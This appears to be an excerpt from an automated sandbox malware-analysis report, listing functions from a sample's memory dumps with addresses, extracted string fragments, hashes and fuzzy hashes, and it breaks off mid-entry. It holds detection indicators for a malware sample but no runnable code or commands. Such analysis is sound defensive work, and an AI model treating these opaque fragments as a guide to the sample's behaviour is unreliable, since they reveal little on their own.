Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: *+$6D135015ECAF0672D0632DF0E28DC412$kh$nz${u
API String ID: 0-4082600940
Opcode ID: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
Instruction ID: 5e5e27deb3d2a1c537a00745a71f84644d2ba910051428d74b7bbeecbd20bb9e
Opcode Fuzzy Hash: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
Instruction Fuzzy Hash: 07D1E1716483508BD724DF38C895BABBBE2EFC1318F19896DE4D68B291D774C409CB46

Function 0215A305 Relevance: 6.7, Strings: 5, Instructions: 407COMMON

Download Yara Rule

Strings

sf, xrefs: 0215A5D2
ooKv, xrefs: 0215A5CA
d~`}, xrefs: 0215A5C2
,fbV, xrefs: 0215A5BA
lvhu, xrefs: 0215A5B2

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: ,fbV$d~`}$lvhu$ooKv$sf
API String ID: 0-4157365443
Opcode ID: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
Instruction ID: 3ce4e13da70521d705ae5f6e24ac8a59c1511936024153af7c71e716a489135a
Opcode Fuzzy Hash: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
Instruction Fuzzy Hash: 0BD11AB15883519FD714CF14C8917ABB7E2AFC5304F088A6CE9D987341E779DA09CB82

Function 0042FCBC Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

_Pna, xrefs: 0042FD26
t, xrefs: 0042FCCC
BVAI, xrefs: 0042FF6A
mc, xrefs: 0042FDF9

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: BVAI$_Pna$mc$t
API String ID: 0-1770441902
Opcode ID: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
Instruction ID: 048c6723a0782cba0ed5f5bfde42b0dc355c8231af3653691a455654dcaa2d5e
Opcode Fuzzy Hash: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
Instruction Fuzzy Hash: 03A1C37050C3D18AE739CF2594103ABBBE1AFD7304F58897ED0D997382DB79814A8B5A

Function 0215FF23 Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

mc, xrefs: 02160060
BVAI, xrefs: 021601D1
t, xrefs: 0215FF33
_Pna, xrefs: 0215FF8D

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: BVAI$_Pna$mc$t
API String ID: 0-1770441902
Opcode ID: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
Instruction ID: 4047fce370677364bf8d5afb992164435ea9c2f4a4f2e4e36ab6b91b84e60207
Opcode Fuzzy Hash: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
Instruction Fuzzy Hash: E8A1C37054C3C18AE739CF2584147BBBBE1AFDB304F1889ADD0D997682DB75810ACB56

Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

D, xrefs: 0042ED68
0, xrefs: 0042ED00
4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A

Function 0042A9F7 Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

bt, xrefs: 0042AE84
v, xrefs: 0042ACB0
v, xrefs: 0042AE5D, 0042ADD1, 0042AE45, 0042AD90, 0042AB80, 0042AC34, 0042AC4B, 0042ABC1
zi, xrefs: 0042AE8C

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: v$v$bt$zi
API String ID: 0-1945541540
Opcode ID: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
Instruction ID: bba7ce1cbd9d7b5964ace128991244c7d88d52c60c2cfa081a52f8c92ce1e01e
Opcode Fuzzy Hash: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
Instruction Fuzzy Hash: 48D1687260C3558FD725CF28D45069FFBE6EBC4304F06892DE8A99B281D774D60ACB86

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

'P0V, xrefs: 0041BD31
9HiN, xrefs: 0041BD21
,D,J, xrefs: 0041BD19
WT, xrefs: 0041BD39

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86

Function 0214BE2C Relevance: 5.2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

Strings

,D,J, xrefs: 0214BF80
9HiN, xrefs: 0214BF88
WT, xrefs: 0214BFA0
'P0V, xrefs: 0214BF98

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction ID: b4a9819ccf9ab4142317871775d7faac46e56018a066af9deb909ff3f81b69f0
Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction Fuzzy Hash: C271C0B554D3958BD304DF12C8802AFBBE2FBD1314F188E6CE5D86B251C739854A8F86

Function 021573B2 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

KGFU, xrefs: 0215757C
UUQg, xrefs: 0215758A
FOOE, xrefs: 0215756E
KGFU, xrefs: 02157628, 0215762B

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: FOOE$KGFU$KGFU$UUQg
API String ID: 0-60738199
Opcode ID: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
Instruction ID: 30b6f5b4f41cb0ee82054490a87695466501120042a88d8048b4101af8181fce
Opcode Fuzzy Hash: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
Instruction Fuzzy Hash: DD517F729D1262CFD7158B68C8421AAFBA2EF55320B1E46A5CC758B3C1D334E903C791

Function 021520D7 Relevance: 4.2, Strings: 3, Instructions: 435COMMON

Download Yara Rule

Strings

(ijkdefgau`c, xrefs: 02152225
au`c, xrefs: 0215222D
defgau`c, xrefs: 02152231

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: (ijkdefgau`c$au`c$defgau`c
API String ID: 0-3415814675
Opcode ID: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
Instruction ID: e412760159858d4848ab6cf72f2a78b90201a68ad62c931e8edb79d67d371b9b
Opcode Fuzzy Hash: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
Instruction Fuzzy Hash: 02D1F0B26483408FD714DF28C891BABBBE1EFC5318F14896CE9958B390E775D805CB52

Function 00434CEF Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

$, xrefs: 00434DE6
., xrefs: 00434DE2
K, xrefs: 00434DDE

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: $$.$K
API String ID: 0-4278605028
Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction ID: 6a15d43e6d9dc7541644536baa1fca88b34eed3a23bb6af0385b7f8a4183f52c
Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction Fuzzy Hash: 69029E71614BC08BE3158F3DC891392BFE2AB56304F1CC9AED4DACB787C229E5458B65

Function 02164F56 Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

$, xrefs: 0216504D
., xrefs: 02165049
K, xrefs: 02165045

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: $$.$K
API String ID: 0-4278605028
Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction ID: 6f1199606bed5220cd47cf38a50aa8a124b781985d6e80a95cb99eebee9c7c2d
Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction Fuzzy Hash: 26029E71614BC08BE3198F3DC891362BFE2AB56304F0CC9ADD4DACB786C269E5458B65

Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

D, xrefs: 0042ED68
4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A

Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

D, xrefs: 0042ED68
4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A

Function 0215EE1A Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

D, xrefs: 0215EFCF
8<j?, xrefs: 0215EFB7
4b, xrefs: 0215F041

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: ed1329f5f1f87e40a9abe0537753f181d9ad9564c01af0512b04a085da4e7ed5
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 5781FB6024C3918BD718CF3984A137AFBD29FD6218F2C89AEE4E58B281D779C506C716

Function 00408F90 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

ut, xrefs: 004090E1
Z, xrefs: 004090E8
#=0, xrefs: 00408FC5

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756

Function 021391F7 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

#=0, xrefs: 0213922C
ut, xrefs: 02139348
Z, xrefs: 0213934F

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: 71c3ad498d9cc938b4352fc7cb248fd90acdadaae95e8d1daa20049a0cefb40e
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: D081263110C7828AD7068F38C55077AFFE2AF93318F1899ADD4D29B792D769C50AC752

Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

D, xrefs: 0042ED68
4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A

Function 0215EE08 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

D, xrefs: 0215EFCF
8<j?, xrefs: 0215EFB7
4b, xrefs: 0215F041

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: 9b8fb97247d6a8927f2cc60c4bb830291f2c20504eaa8b7b6e259e58eae4f839
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7A810C6124C3918BD719CF3984A137AFFD29FD6218F1C49ADE4E18B281D339C50ACB56

Function 00442D20 Relevance: 4.0, Strings: 3, Instructions: 282COMMON

Download Yara Rule

Strings

D`a&, xrefs: 00442ED5
NMNO, xrefs: 00442E20
bX_^, xrefs: 00442D22

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: InitializeThunk
String ID: D`a&$NMNO$bX_^
API String ID: 2994545307-620122162
Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759

Function 0041825B Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

), xrefs: 0041837A
gfff, xrefs: 004183EA
7, xrefs: 004183A3

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: )$7$gfff
API String ID: 0-3859371245
Opcode ID: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
Instruction ID: 9f03ba7914f0360cb7709cea8ad3b28f347f0d2189de7c473bd193f5a0b7fd0c
Opcode Fuzzy Hash: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
Instruction Fuzzy Hash: D4812572A142118BD324CF28DC417AB77E2EBC8314F18C92ED985DB395EB3CD8468785

Function 021484C2 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

7, xrefs: 0214860A
gfff, xrefs: 02148651
), xrefs: 021485E1

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: )$7$gfff
API String ID: 0-3859371245
Opcode ID: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
Instruction ID: c2ef9608447236b80a018974e6c68b245ee3a5a24aca89d030d19336b344b6a2
Opcode Fuzzy Hash: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
Instruction Fuzzy Hash: FE812872A542518BD328CF28CC51BAF77E2EBC4314F1AC92DD489DB395EB38D5068B85

Function 00427133 Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

KGFU, xrefs: 00427315
FOOE, xrefs: 00427307
UUQg, xrefs: 00427323

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: FOOE$KGFU$UUQg
API String ID: 0-2281124432
Opcode ID: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
Instruction ID: e3d0f05a3102c402a5be3d16b6d50dde008b8d5973f854c9b7a8b98ef3316d4d
Opcode Fuzzy Hash: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
Instruction Fuzzy Hash: 9A619D72B49262CFD710CBA4D8402AAF7A2EF55310B5D42ABD8558B382E33CDD12D3A5

Function 0041AF24 Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

t]ae, xrefs: 0041B081
5230, xrefs: 0041AFC1
I`af, xrefs: 0041B038

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 5230$I`af$t]ae
API String ID: 0-812676372
Opcode ID: 69b55e9c59f984ca031ddda7f553905b2866cdbf307ebf2f1898f1c112d00d2e
Instruction ID: cc3bff843b66776ddd05c04f0bda8cfb631fd3a3b5e3538274f97fe5caba7e22
Opcode Fuzzy Hash: 69b55e9c59f984ca031ddda7f553905b2866cdbf307ebf2f1898f1c112d00d2e
Instruction Fuzzy Hash: D7515972A15B804FD738CF66C891767BBE3ABA5304F19896DC1C287695DABCA405C704

Function 0214B18B Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

5230, xrefs: 0214B228
I`af, xrefs: 0214B29F
t]ae, xrefs: 0214B2E8

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: 5230$I`af$t]ae
API String ID: 0-812676372
Opcode ID: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
Instruction ID: bfdb4628cf08319da1e8c9cae4ac1b8349d3cba4974f31be754cb04b11ccd381
Opcode Fuzzy Hash: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
Instruction Fuzzy Hash: 06513872A59B808FD739CF65C891B67BBE3AB91308F19896DC1C287695DBB9E005C700

Function 0041DAD0 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

A, xrefs: 0041DC18
5230, xrefs: 0041DB20
1, xrefs: 0041DBA3

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 1$5230$A
API String ID: 0-2921844354
Opcode ID: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
Instruction ID: e76a71f95e24524307293e01d01a6f58a23ad2f1a40c0433447d02162c8ae966
Opcode Fuzzy Hash: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
Instruction Fuzzy Hash: F8416972A5C3405AE324AE65CC827ABB6D3EBD1324F18C93EF1D9472C5E9F848428316

Function 0213092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 021309DC, 021309DF, 021309E4
., xrefs: 0213095F
l, xrefs: 02130966

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3836c2c0c9d7d0588d79a54d7fb2a89bb352c49fe921cc1f55db2b8726cc0980
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 51314CB6940609DFDB11CF99C880AAEBBF6FF48324F15404AD445AB310D771EA45CFA4

Function 00414C20 Relevance: 3.5, Strings: 2, Instructions: 989COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415070
UA, xrefs: 004155D4

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: NP,?$UA
API String ID: 0-2573221895
Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789

Function 0041F6D0 Relevance: 3.3, Strings: 2, Instructions: 817COMMON

Download Yara Rule

Strings

B, xrefs: 00420058
9B, xrefs: 004201A0

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 9B$B
API String ID: 0-4208784936
Opcode ID: 986acf23185ab1b50e6ad9565e7f762b14932ce870d5dbc259a2a73c0999a18c
Instruction ID: b8962ee0846928653caa32ab1d9872d6313577c24d17d84896ac92dc99d0ed25
Opcode Fuzzy Hash: 986acf23185ab1b50e6ad9565e7f762b14932ce870d5dbc259a2a73c0999a18c
Instruction Fuzzy Hash: EF72B1B1619F808ED329CF3C8805397BFD6AB5A324F188B5EA0FA877D2C77561018756

Function 0042B170 Relevance: 2.9, Strings: 2, Instructions: 428COMMON

Download Yara Rule

Strings

{wBy, xrefs: 0042B538
?;;, xrefs: 0042B3AA

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
